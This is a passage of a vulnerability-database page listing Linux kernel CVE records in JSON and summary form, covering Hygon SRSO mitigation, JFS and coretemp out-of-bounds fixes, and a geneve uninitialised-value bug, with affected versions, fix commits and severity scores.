"url": "https://git.kernel.org/stable/c/e7ea043bc3f19473561c08565047b3f1671bf35d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f090a8b4d2e3ec6f318d6fdab243a2edc5a8cc37"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6ce2f297a7168274547d0b5aea6c7c16268b8a96"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cf43b304b6952b549d58feabc342807b334f03d4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a5ef7d68cea1344cf524f04981c2b3f80bedbb0d"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"arch/x86/kernel/cpu/common.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "e7ea043bc3f19473561c08565047b3f1671bf35d",
"status": "affected",
"version": "c9661c1e80b609cd038db7c908e061f0535804ef",
"versionType": "git"
},
{
"lessThan": "f090a8b4d2e3ec6f318d6fdab243a2edc5a8cc37",
"status": "affected",
"version": "c9661c1e80b609cd038db7c908e061f0535804ef",
"versionType": "git"
},
{
"lessThan": "6ce2f297a7168274547d0b5aea6c7c16268b8a96",
"status": "affected",
"version": "c9661c1e80b609cd038db7c908e061f0535804ef",
"versionType": "git"
},
{
"lessThan": "cf43b304b6952b549d58feabc342807b334f03d4",
"status": "affected",
"version": "c9661c1e80b609cd038db7c908e061f0535804ef",
"versionType": "git"
},
{
"lessThan": "a5ef7d68cea1344cf524f04981c2b3f80bedbb0d",
"status": "affected",
"version": "c9661c1e80b609cd038db7c908e061f0535804ef",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"arch/x86/kernel/cpu/common.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.20"
},
{
"lessThan": "4.20",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.134",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.56",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.5.*",
"status": "unaffected",
"version": "6.5.6",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.6",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.134",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.56",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.5.6",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6",
"versionStartIncluding": "4.20",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/srso: Add SRSO mitigation for Hygon processors\n\nAdd mitigation for the speculative return stack overflow vulnerability\nwhich exists on Hygon processors too."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-21T08:49:44.230Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/e7ea043bc3f19473561c08565047b3f1671bf35d"
},
{
"url": "https://git.kernel.org/stable/c/f090a8b4d2e3ec6f318d6fdab243a2edc5a8cc37"
},
{
"url": "https://git.kernel.org/stable/c/6ce2f297a7168274547d0b5aea6c7c16268b8a96"
},
{
"url": "https://git.kernel.org/stable/c/cf43b304b6952b549d58feabc342807b334f03d4"
},
{
"url": "https://git.kernel.org/stable/c/a5ef7d68cea1344cf524f04981c2b3f80bedbb0d"
}
],
"title": "x86/srso: Add SRSO mitigation for Hygon processors",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52482",
"datePublished": "2024-02-29T05:43:13.242Z",
"dateReserved": "2024-02-20T12:30:33.301Z",
"dateUpdated": "2025-05-21T08:49:44.230Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52601 (GCVE-0-2023-52601)
Vulnerability from cvelistv5
Published
2024-03-06 06:45
Modified
2025-05-04 07:39
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
jfs: fix array-index-out-of-bounds in dbAdjTree
Currently there is a bound check missing in the dbAdjTree while
accessing the dmt_stree. To add the required check added the bool is_ctl
which is required to determine the size as suggest in the following
commit.
https://lore.kernel.org/linux-kernel-mentees/f9475918-2186-49b8-b801-6f0f9e75f4fa@oracle.com/
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unaffected",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "3d3898b4d72c",
"status": "affected",
"version": "1da177e4c3f4",
"versionType": "git"
},
{
"lessThan": "3f8217c323fd",
"status": "affected",
"version": "1da177e4c3f4",
"versionType": "git"
},
{
"lessThan": "2037cb9d95f1",
"status": "affected",
"version": "1da177e4c3f4",
"versionType": "git"
},
{
"lessThan": "8393c80cce45",
"status": "affected",
"version": "1da177e4c3f4",
"versionType": "git"
},
{
"lessThan": "70780914cb57",
"status": "affected",
"version": "1da177e4c3f4",
"versionType": "git"
},
{
"lessThan": "2e16a1389b5a",
"status": "affected",
"version": "1da177e4c3f4",
"versionType": "git"
},
{
"lessThan": "fc67a2e18f4c",
"status": "affected",
"version": "1da177e4c3f4",
"versionType": "git"
},
{
"lessThan": "74ecdda68242",
"status": "affected",
"version": "1da177e4c3f4",
"versionType": "git"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
],
"defaultStatus": "affected",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "4.19.0",
"status": "unaffected",
"version": "4.19.307",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.0",
"status": "unaffected",
"version": "5.4.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.0",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.0",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.0",
"status": "unaffected",
"version": "6.1.77",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.0",
"status": "unaffected",
"version": "6.6.16",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.0",
"status": "unaffected",
"version": "6.7.4",
"versionType": "semver"
},
{
"lessThan": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "semver"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2023-52601",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-11-12T18:14:12.585306Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-129",
"description": "CWE-129 Improper Validation of Array Index",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-11-12T18:45:39.451Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:21.250Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3d3898b4d72c677d47fe3cb554449f2df5c12555"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3f8217c323fd6ecd6829a0c3ae7ac3f14eac368e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2037cb9d95f1741885f7daf50e8a028c4ade5317"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8393c80cce45f40c1256d72e21ad351b3650c57e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/70780914cb57e2ba711e0ac1b677aaaa75103603"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2e16a1389b5a7983b45cb2aa20b0e3f0ee364d6c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fc67a2e18f4c4e3f07e9f9ae463da24530470e73"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/74ecdda68242b174920fe7c6133a856fb7d8559b"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/jfs/jfs_dmap.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "3d3898b4d72c677d47fe3cb554449f2df5c12555",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "3f8217c323fd6ecd6829a0c3ae7ac3f14eac368e",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "2037cb9d95f1741885f7daf50e8a028c4ade5317",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "8393c80cce45f40c1256d72e21ad351b3650c57e",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "70780914cb57e2ba711e0ac1b677aaaa75103603",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "2e16a1389b5a7983b45cb2aa20b0e3f0ee364d6c",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "fc67a2e18f4c4e3f07e9f9ae463da24530470e73",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "74ecdda68242b174920fe7c6133a856fb7d8559b",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/jfs/jfs_dmap.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.307",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.77",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.16",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.307",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.269",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.77",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\njfs: fix array-index-out-of-bounds in dbAdjTree\n\nCurrently there is a bound check missing in the dbAdjTree while\naccessing the dmt_stree. To add the required check added the bool is_ctl\nwhich is required to determine the size as suggest in the following\ncommit.\nhttps://lore.kernel.org/linux-kernel-mentees/f9475918-2186-49b8-b801-6f0f9e75f4fa@oracle.com/"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:39:34.043Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/3d3898b4d72c677d47fe3cb554449f2df5c12555"
},
{
"url": "https://git.kernel.org/stable/c/3f8217c323fd6ecd6829a0c3ae7ac3f14eac368e"
},
{
"url": "https://git.kernel.org/stable/c/2037cb9d95f1741885f7daf50e8a028c4ade5317"
},
{
"url": "https://git.kernel.org/stable/c/8393c80cce45f40c1256d72e21ad351b3650c57e"
},
{
"url": "https://git.kernel.org/stable/c/70780914cb57e2ba711e0ac1b677aaaa75103603"
},
{
"url": "https://git.kernel.org/stable/c/2e16a1389b5a7983b45cb2aa20b0e3f0ee364d6c"
},
{
"url": "https://git.kernel.org/stable/c/fc67a2e18f4c4e3f07e9f9ae463da24530470e73"
},
{
"url": "https://git.kernel.org/stable/c/74ecdda68242b174920fe7c6133a856fb7d8559b"
}
],
"title": "jfs: fix array-index-out-of-bounds in dbAdjTree",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52601",
"datePublished": "2024-03-06T06:45:28.715Z",
"dateReserved": "2024-03-02T21:55:42.573Z",
"dateUpdated": "2025-05-04T07:39:34.043Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26664 (GCVE-0-2024-26664)
Vulnerability from cvelistv5
Published
2024-04-02 06:22
Modified
2025-05-04 12:54
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
hwmon: (coretemp) Fix out-of-bounds memory access
Fix a bug that pdata->cpu_map[] is set before out-of-bounds check.
The problem might be triggered on systems with more than 128 cores per
package.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 4f9dcadc55c21b39b072bb0882362c7edc4340bc Version: c00cdfc9bd767ee743ad3a4054de17aeb0afcbca Version: d9f0159da05df869071164edf0c6d7302efc5eca Version: 30cf0dee372baf9b515f2d9c7218f905fddf3cdb Version: 7108b80a542b9d65e44b36d64a700a83658c0b73 Version: 7108b80a542b9d65e44b36d64a700a83658c0b73 Version: 7108b80a542b9d65e44b36d64a700a83658c0b73 Version: 7108b80a542b9d65e44b36d64a700a83658c0b73 Version: d1de8e1ae924d9dc31548676e4a665b52ebee27e |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:12.458Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/93f0f4e846fcb682c3ec436e3b2e30e5a3a8ee6a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1eb74c00c9c3b13cb65e508c5d5a2f11afb96b8b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f0da068c75c20ffc5ba28243ff577531dc2af1fd"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a16afec8e83c56b14a4a73d2e3fb8eec3a8a057e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9bce69419271eb8b2b3ab467387cb59c99d80deb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/853a6503c586a71abf27e60a7f8c4fb28092976d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3a7753bda55985dc26fae17795cb10d825453ad1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4e440abc894585a34c2904a32cd54af1742311b3"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26664",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:53:46.681028Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:32:57.064Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/hwmon/coretemp.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "93f0f4e846fcb682c3ec436e3b2e30e5a3a8ee6a",
"status": "affected",
"version": "4f9dcadc55c21b39b072bb0882362c7edc4340bc",
"versionType": "git"
},
{
"lessThan": "1eb74c00c9c3b13cb65e508c5d5a2f11afb96b8b",
"status": "affected",
"version": "c00cdfc9bd767ee743ad3a4054de17aeb0afcbca",
"versionType": "git"
},
{
"lessThan": "f0da068c75c20ffc5ba28243ff577531dc2af1fd",
"status": "affected",
"version": "d9f0159da05df869071164edf0c6d7302efc5eca",
"versionType": "git"
},
{
"lessThan": "a16afec8e83c56b14a4a73d2e3fb8eec3a8a057e",
"status": "affected",
"version": "30cf0dee372baf9b515f2d9c7218f905fddf3cdb",
"versionType": "git"
},
{
"lessThan": "9bce69419271eb8b2b3ab467387cb59c99d80deb",
"status": "affected",
"version": "7108b80a542b9d65e44b36d64a700a83658c0b73",
"versionType": "git"
},
{
"lessThan": "853a6503c586a71abf27e60a7f8c4fb28092976d",
"status": "affected",
"version": "7108b80a542b9d65e44b36d64a700a83658c0b73",
"versionType": "git"
},
{
"lessThan": "3a7753bda55985dc26fae17795cb10d825453ad1",
"status": "affected",
"version": "7108b80a542b9d65e44b36d64a700a83658c0b73",
"versionType": "git"
},
{
"lessThan": "4e440abc894585a34c2904a32cd54af1742311b3",
"status": "affected",
"version": "7108b80a542b9d65e44b36d64a700a83658c0b73",
"versionType": "git"
},
{
"status": "affected",
"version": "d1de8e1ae924d9dc31548676e4a665b52ebee27e",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/hwmon/coretemp.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.1"
},
{
"lessThan": "6.1",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.307",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.78",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.17",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.5",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.307",
"versionStartIncluding": "4.19.264",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.269",
"versionStartIncluding": "5.4.221",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "5.10.152",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "5.15.76",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.78",
"versionStartIncluding": "6.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.17",
"versionStartIncluding": "6.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.5",
"versionStartIncluding": "6.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "6.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "6.0.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nhwmon: (coretemp) Fix out-of-bounds memory access\n\nFix a bug that pdata-\u003ecpu_map[] is set before out-of-bounds check.\nThe problem might be triggered on systems with more than 128 cores per\npackage."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:54:21.694Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/93f0f4e846fcb682c3ec436e3b2e30e5a3a8ee6a"
},
{
"url": "https://git.kernel.org/stable/c/1eb74c00c9c3b13cb65e508c5d5a2f11afb96b8b"
},
{
"url": "https://git.kernel.org/stable/c/f0da068c75c20ffc5ba28243ff577531dc2af1fd"
},
{
"url": "https://git.kernel.org/stable/c/a16afec8e83c56b14a4a73d2e3fb8eec3a8a057e"
},
{
"url": "https://git.kernel.org/stable/c/9bce69419271eb8b2b3ab467387cb59c99d80deb"
},
{
"url": "https://git.kernel.org/stable/c/853a6503c586a71abf27e60a7f8c4fb28092976d"
},
{
"url": "https://git.kernel.org/stable/c/3a7753bda55985dc26fae17795cb10d825453ad1"
},
{
"url": "https://git.kernel.org/stable/c/4e440abc894585a34c2904a32cd54af1742311b3"
}
],
"title": "hwmon: (coretemp) Fix out-of-bounds memory access",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26664",
"datePublished": "2024-04-02T06:22:13.341Z",
"dateReserved": "2024-02-19T14:20:24.148Z",
"dateUpdated": "2025-05-04T12:54:21.694Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26857 (GCVE-0-2024-26857)
Vulnerability from cvelistv5
Published
2024-04-17 10:17
Modified
2025-05-04 08:58
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
geneve: make sure to pull inner header in geneve_rx()
syzbot triggered a bug in geneve_rx() [1]
Issue is similar to the one I fixed in commit 8d975c15c0cd
("ip6_tunnel: make sure to pull inner header in __ip6_tnl_rcv()")
We have to save skb->network_header in a temporary variable
in order to be able to recompute the network_header pointer
after a pskb_inet_may_pull() call.
pskb_inet_may_pull() makes sure the needed headers are in skb->head.
[1]
BUG: KMSAN: uninit-value in IP_ECN_decapsulate include/net/inet_ecn.h:302 [inline]
BUG: KMSAN: uninit-value in geneve_rx drivers/net/geneve.c:279 [inline]
BUG: KMSAN: uninit-value in geneve_udp_encap_recv+0x36f9/0x3c10 drivers/net/geneve.c:391
IP_ECN_decapsulate include/net/inet_ecn.h:302 [inline]
geneve_rx drivers/net/geneve.c:279 [inline]
geneve_udp_encap_recv+0x36f9/0x3c10 drivers/net/geneve.c:391
udp_queue_rcv_one_skb+0x1d39/0x1f20 net/ipv4/udp.c:2108
udp_queue_rcv_skb+0x6ae/0x6e0 net/ipv4/udp.c:2186
udp_unicast_rcv_skb+0x184/0x4b0 net/ipv4/udp.c:2346
__udp4_lib_rcv+0x1c6b/0x3010 net/ipv4/udp.c:2422
udp_rcv+0x7d/0xa0 net/ipv4/udp.c:2604
ip_protocol_deliver_rcu+0x264/0x1300 net/ipv4/ip_input.c:205
ip_local_deliver_finish+0x2b8/0x440 net/ipv4/ip_input.c:233
NF_HOOK include/linux/netfilter.h:314 [inline]
ip_local_deliver+0x21f/0x490 net/ipv4/ip_input.c:254
dst_input include/net/dst.h:461 [inline]
ip_rcv_finish net/ipv4/ip_input.c:449 [inline]
NF_HOOK include/linux/netfilter.h:314 [inline]
ip_rcv+0x46f/0x760 net/ipv4/ip_input.c:569
__netif_receive_skb_one_core net/core/dev.c:5534 [inline]
__netif_receive_skb+0x1a6/0x5a0 net/core/dev.c:5648
process_backlog+0x480/0x8b0 net/core/dev.c:5976
__napi_poll+0xe3/0x980 net/core/dev.c:6576
napi_poll net/core/dev.c:6645 [inline]
net_rx_action+0x8b8/0x1870 net/core/dev.c:6778
__do_softirq+0x1b7/0x7c5 kernel/softirq.c:553
do_softirq+0x9a/0xf0 kernel/softirq.c:454
__local_bh_enable_ip+0x9b/0xa0 kernel/softirq.c:381
local_bh_enable include/linux/bottom_half.h:33 [inline]
